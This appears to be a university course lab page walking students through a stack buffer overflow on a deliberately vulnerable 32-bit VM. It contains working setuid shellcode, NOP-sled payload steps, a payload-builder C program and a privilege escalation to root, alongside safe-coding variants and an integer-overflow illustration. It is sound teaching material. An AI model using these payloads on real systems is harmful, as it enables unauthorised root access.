BuffOverflowDemo_details

VM images

VirtualBox

  • OVF:  https://pages.cs.wisc.edu/~chatterjee/classes/vms/Boxes2.ovf
  • Disk:  https://pages.cs.wisc.edu/~chatterjee/classes/vms/Boxes2-disk1.vmdk

VMware

  • Image: https://pages.cs.wisc.edu/~chatterjee/classes/vms/vmware-boxes-2.1.tar.bz2

 

SSH access

It might be easier to work on the VM over SSH from the host, since copying and pasting commands is much easier that way. I prefer to use SSH, but you are free to use the native VM console instead. Here are some guidelines in case you want to use SSH.

 

You will have to enable port forwarding in VirtualBox before you can reach the VM over SSH from a terminal on the host:

  • In the VirtualBox window where the VM is listed, right-click the VM and choose Settings.
  • In the Network tab, under Adapter 1, set 'Attached to' to NAT.
  • Under Advanced, click Port Forwarding, which opens a window for forwarding rules.
  • Add an entry with the following fields:

 ---------------------------------------------------------------------------------------------
 |  Name  | Protocol |  Host IP  |        Host Port          |  Guest IP    | Guest Port |
 ---------------------------------------------------------------------------------------------
 |  SSH   |   TCP    | 127.0.0.1 | <unused port above 1024>  | <keep empty> |     22     |
 ---------------------------------------------------------------------------------------------

Example:

 ---------------------------------------------------------------------------------------------
 |  Name  | Protocol |  Host IP  |        Host Port          |  Guest IP    | Guest Port |
 ---------------------------------------------------------------------------------------------
 |  SSH   |   TCP    | 127.0.0.1 |           2222            | <keep empty> |     22     |
 ---------------------------------------------------------------------------------------------

Keep the Host IP at 127.0.0.1 (or leave it empty, which VirtualBox treats the same way). Entering 0.0.0.0 binds the forwarded port on every interface of your host, which would expose the VM's SSH service, with its default user/user and root/root passwords, to anyone on the same network.

Save the settings and restart your Virtual Machine. Now SSH into the VM from terminal using the following command

            ssh -p 2222 user@127.0.0.1

You can also scp files into the VM using the following command (note the capital -P for the port with scp):

            scp -P 2222 file1 user@127.0.0.1:~/
I normally add these lines to the ssh config file ~/.ssh/config on the host machine:

  Host vm
      HostName localhost
      User user
      ServerAliveInterval 120
      Port 2222

And then you can do `ssh vm` or `scp file1 vm:~/` without repeating the port and user.

Tips for these VM images

  • The user account username/password: `user/user`
  • The root account username/password: `root/root`

 


Code

Download the source files to a demo directory: https://pages.cs.wisc.edu/~chatterjee/classes/vms/demo.tar.gz

Run the following commands from your host machine's shell. (Make sure you have set up SSH as described above.)

Copy files _TO_ the VM:

  scp -P 2222 demo/* user@localhost:~/

Copy files _FROM_ the VM:

  scp -P 2222 user@localhost:~/* demo/
Or, even better, mount the VM's home directory on your machine if you have sshfs installed (the -p 2222 is needed for the same reason as with ssh and scp):

  mkdir ~/demo_vm;  sshfs -p 2222 user@localhost: ~/demo_vm

~/demo_vm is now the VM's home directory mounted live on your host, so anything you edit there is immediately visible inside the VM; there is no copying step. Unmount it with `fusermount -u ~/demo_vm` on Linux or `umount ~/demo_vm` on macOS. Windows users can look at https://github.com/billziss-gh/sshfs-win for sshfs-win.

 

Resources

This meet.c exploit demo is taken from Chapter 11 of Gray Hat Hacking: The Ethical Hacker's Handbook. See this document if you get stuck and need more information.

 

Test and crash meet

Build our source

On the VM, after you've copied the source files over, compile them:

  gcc -o meet meet.c
  gcc -o get_sp get_sp.c

The rest of this demo relies on the VM being a 32-bit system built without a stack protector, with an executable stack, and with address-space randomization turned off; get_sp printing the same value on two runs (below) is the check that randomization is off. On a current distribution the same binaries would have to be built with `gcc -m32 -fno-stack-protector -z execstack` and the kernel told `sysctl -w kernel.randomize_va_space=0`, or the fixed return address in the payload will not land.
 

Test and break meet

$ ./meet rahul H@x0r
$ perl -e 'print "A"x200'
$ echo $(perl -e 'print "A"x200')
$ ./meet rahul $(perl -e 'print "A"x200')
$ ./meet rahul $(perl -e 'print "A"x500')

The two perl lines only show you the 200-byte string and how the shell substitutes it as an argument. The 200-byte argument still fits in meet's buffer; the 500-byte one runs past it and should end in a segmentation fault.

You may substitute your name for 'rahul' if you want to!
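Why 200 bytes passes and 500 crashes, as an added example that is not part of the demo's sources: it is modelled on the book's meet.c, which I am assuming is a greeting() function that strcpy()s its second argument into a 400-byte stack buffer (check the real file in demo.tar.gz). The would_overflow() helper and the hardened greeting_safe() beside the vulnerable pattern are mine.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size of meet.c's greeting() (hypothetical; check demo.tar.gz). */
#define NAME_SZ 400

/* The vulnerable pattern: strcpy() copies up to and including the source's NUL
   terminator and never looks at sizeof name.  Anything longer than 399 bytes
   spills past the buffer into the saved frame pointer and return address
   (the exact distance depends on the compiler's frame layout). */
int greeting_unsafe(const char *temp1, const char *temp2)
{
    char name[NAME_SZ];
    strcpy(name, temp2);                 /* the bug */
    printf("Hello %s %s\n", temp1, name);
    return (int)strlen(name);
}

/* How many bytes of temp2 (plus its terminator) would land past the end of
   name[]. 0 means the argument fits; a positive value is the size of the overrun. */
long would_overflow(const char *temp2)
{
    long needed = (long)strlen(temp2) + 1;   /* + NUL terminator */
    return needed > NAME_SZ ? needed - NAME_SZ : 0;
}

/* Hardened variant: check the length against the destination before copying
   and refuse oversized input instead of silently truncating it.
   Returns the length copied, or -1 if the argument does not fit. */
int greeting_safe(const char *temp1, const char *temp2)
{
    char name[NAME_SZ];
    size_t len = strlen(temp2);
    if (len >= sizeof name)              /* no room for the terminator */
        return -1;
    memcpy(name, temp2, len + 1);        /* bounded copy, terminator included */
    printf("Hello %s %s\n", temp1, name);
    return (int)len;
}

int main(int argc, char *argv[])
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <name> <greeting>\n", argv[0]);
        return 1;
    }
    long over = would_overflow(argv[2]);
    if (over > 0)
        fprintf(stderr, "argument would overrun name[%d] by %ld bytes\n", NAME_SZ, over);
    if (greeting_safe(argv[1], argv[2]) < 0) {
        fprintf(stderr, "rejected: greeting longer than %d bytes\n", NAME_SZ - 1);
        return 1;
    }
    printf("Bye %s %s\n", argv[1], argv[2]);
    return 0;
}
```

Run it with the same arguments as meet (`./safe-meet rahul $(perl -e 'print "A"x500')`): the 500-byte argument is reported as a 101-byte overrun and rejected, where meet would have crashed.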

 

Control-flow hijack and privilege escalation for meet.c

Setup setuid super-meet

Make a copy of meet, give it to root and mark it setuid (remember the root password is root).

  su root
  cp meet super-meet
  chown root:root super-meet
  chmod u+s super-meet
  exit

Generate shellcode

Be careful copy-pasting this command: copy-pasting may introduce unintended line-break characters. It is a single line. The bytes are a 32-bit x86 setuid(0) followed by execve("/bin/sh"), and they contain no 0x00 byte, which matters because the copy into meet's buffer stops at the first NUL.

perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";' > shellcode

Check the length: shellcode should be 53 bytes. If not, something is wrong; you probably added an unintended line break or some other character.

$ wc -c shellcode

Get the stack pointer

 $ ./get_sp

Check it twice! It shouldn't change.

 $ ./get_sp

Compute an approximate landing spot: ESP - 0x300. The aim is an address that falls inside the NOP sled once the payload sits on meet's stack. The ESP that get_sp prints is not the ESP inside meet (different program, different arguments), so this is a guess; the sled and the trial-and-error below make it good enough.

(In the lines below, substitute your own ESP values.)

Stack pointer (ESP): 0xbffff672 - 0x300 = 0xbffff372

Convert to little-endian byte order, since x86 stores the low byte of an address first: 0x72 0xf3 0xff 0xbf. The address must not contain a 0x00 byte, because the copy into meet's buffer stops at the first NUL. Use perl to print these four bytes 38 times (152 bytes), so that whichever copy lands on the saved return address points into the sled:

  perl -e 'print"\x72\xf3\xff\xbf"x38' > sp-repeat

Running the exploit

Run the exploit. Keep changing the size of the NOP sled until the exploit lines up on the stack, that is, until the return address you chose falls inside the sled. Try 200, 201, 202, ....

  ./meet rahul "$(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)"

If you get a shell instead of a segfault, voila!

Check super-meet; it should be owned by root and marked setuid (an 's' in place of the owner's 'x' in the mode):

$ ls -l

Check your id; it should be user (uid 1000):

$ id

Run the exploit against super-meet. If you get a shell, check your uid with `id`. The shellcode calls setuid(0) before execve, so in a setuid-root process the shell's real uid becomes 0 as well, not just its effective uid.

  ./super-meet rahul "$(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)"
Now you are root!!!
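The payload construction above (ESP minus an offset, little-endian encoding, NOP sled + shellcode + repeated return address) as one small program, added here as an example; it is not part of the demo's sources. It embeds the 53-byte shellcode from this page, refuses to emit a payload whose address or shellcode contains a 0x00 byte (the copy into meet's buffer would stop there), and writes the payload to stdout so it can stand in for the perl/cat pipeline. The name mkpayload, the 0x300 default offset, the default of 38 address copies and the command-line format are my choices.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The 53-byte shellcode from this page: setuid(0); execve("/bin/sh", ...); exit(0). */
static const unsigned char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"                          /* setuid(0)                  */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"  /* jmp; pop esi = &"/bin/sh"; */
                                                                /* build argv, NUL-terminate  */
    "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"          /* execve(esi, argv, envp)    */
    "\x31\xdb\x89\xd8\x40\xcd\x80"                              /* exit(0)                    */
    "\xe8\xdc\xff\xff\xff"                                      /* call back to the pop       */
    "/bin/sh";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)                   /* drop the literal's NUL     */

/* Any 0x00 byte ends a strcpy()-style copy, so the whole payload must be NUL-free. */
int has_nul(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0) return 1;
    return 0;
}

/* Guess for where the NOP sled will sit: the ESP get_sp printed, minus an offset. */
uint32_t landing_addr(uint32_t esp, uint32_t offset) { return esp - offset; }

/* x86 is little-endian: the address goes into memory low byte first. */
void put_le32(uint32_t v, unsigned char out[4])
{
    out[0] = v & 0xff;         out[1] = (v >> 8) & 0xff;
    out[2] = (v >> 16) & 0xff; out[3] = (v >> 24) & 0xff;
}

/* Lay out [NOP sled][shellcode][return address x reps] into out.
   Returns the payload length, or 0 if it does not fit in out or would contain a NUL. */
size_t build_payload(size_t nops, uint32_t ret, size_t reps, unsigned char *out, size_t outsz)
{
    size_t total = nops + SHELLCODE_LEN + 4 * reps;
    unsigned char le[4];
    if (total > outsz) return 0;
    put_le32(ret, le);
    if (has_nul(le, 4) || has_nul(shellcode, SHELLCODE_LEN)) return 0;
    memset(out, 0x90, nops);                               /* 0x90 = NOP */
    memcpy(out + nops, shellcode, SHELLCODE_LEN);
    for (size_t i = 0; i < reps; i++)
        memcpy(out + nops + SHELLCODE_LEN + 4 * i, le, 4);
    return total;
}

int main(int argc, char **argv)
{
    if (argc < 3) {
        fprintf(stderr, "usage: %s <nops> <esp-hex> [reps]   e.g. %s 200 bffff672 38\n", argv[0], argv[0]);
        return 1;
    }
    size_t nops = strtoul(argv[1], NULL, 0);
    uint32_t esp = (uint32_t)strtoul(argv[2], NULL, 16);
    size_t reps = argc > 3 ? strtoul(argv[3], NULL, 0) : 38;
    uint32_t ret = landing_addr(esp, 0x300);
    unsigned char buf[4096];
    size_t n = build_payload(nops, ret, reps, buf, sizeof buf);
    if (n == 0) {
        fprintf(stderr, "payload rejected: too long, or 0x%08x contains a NUL byte\n", (unsigned)ret);
        return 1;
    }
    /* Diagnostics go to stderr so that $(...) captures only the payload bytes. */
    fprintf(stderr, "ret=0x%08x nops=%zu total=%zu bytes\n", (unsigned)ret, nops, n);
    fwrite(buf, 1, n, stdout);
    return 0;
}
```

Build it on the VM with `gcc -o mkpayload mkpayload.c` and use it in place of the perl/cat pipeline: `./meet rahul "$(./mkpayload 200 bffff672)"`, then bump the first argument to 201, 202, ... exactly as above. With 200 NOPs the payload is 200 + 53 + 152 = 405 bytes, the same as the perl version.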

 

Test integer overflow vulnerability

The three runs below use a normal width, a larger width, and 65536, which is exactly 2^16 and so wraps to 0 if the program ever holds it in a 16-bit integer. Watch how the program reacts to each.

$ gcc -o width width.c
$ ./width 5 "Hello there"
$ ./width 85 "Hello there"
$ ./width 65536 "Hello there"
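An illustration of the width/truncation bug class this section tests, added here as an example. It is not the demo's width.c (whose source is not on this page) but a hypothetical program built to react to the same three inputs: a normal width, a width past the buffer, and 65536. The vulnerable check validates a 16-bit copy of the width while the write would use the full int; the fixed check validates the value in the type it is actually used in. BUFSZ, the function names and the padding behaviour are my assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSZ 80   /* hypothetical output buffer size */

/* Vulnerable: the bounds check runs on a truncated 16-bit copy of width.
   65536 becomes 0 and passes, but the caller would then write the full
   65536 bytes. Returns the number of bytes the vulnerable path would write,
   or -1 if the check rejects the width. (It only reports; it never performs
   the oversized write.) */
long vuln_write_len(int width)
{
    unsigned short w = (unsigned short)width;   /* 65536 -> 0, 65616 -> 80 */
    if (w > BUFSZ) return -1;
    return width;                               /* untruncated value used for the write */
}

/* Fixed: validate the same value that will be used, and reject negatives
   before any conversion to an unsigned or narrower type. */
long fixed_write_len(int width)
{
    if (width < 0 || width > BUFSZ) return -1;
    return width;
}

/* Left-justify s in a field of 'width' columns using the fixed check.
   Returns the field length written (excluding the terminator), or -1 if
   the width is rejected or the destination is too small. */
int pad_to_width(char *dst, size_t dstsz, const char *s, int width)
{
    long n = fixed_write_len(width);
    if (n < 0 || (size_t)n >= dstsz) return -1;
    size_t len = strlen(s);
    if (len > (size_t)n) len = (size_t)n;       /* clip the string to the field */
    memcpy(dst, s, len);
    memset(dst + len, ' ', (size_t)n - len);
    dst[n] = '\0';
    return (int)n;
}

int main(int argc, char *argv[])
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <width> <string>\n", argv[0]);
        return 1;
    }
    int width = atoi(argv[1]);
    char out[BUFSZ + 1];
    printf("vulnerable check would write %ld bytes into a %d-byte buffer\n",
           vuln_write_len(width), BUFSZ);
    if (pad_to_width(out, sizeof out, argv[2], width) < 0) {
        fprintf(stderr, "width %d rejected\n", width);
        return 1;
    }
    printf("[%s]\n", out);
    return 0;
}
```

Run it with the same three arguments as width: 5 and 85 behave as you would expect from the checks, and 65536 shows the vulnerable check accepting a write of 65536 bytes into an 80-byte buffer while the fixed check rejects it.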
 

Issues

If you find any problems with this demo: send me an email.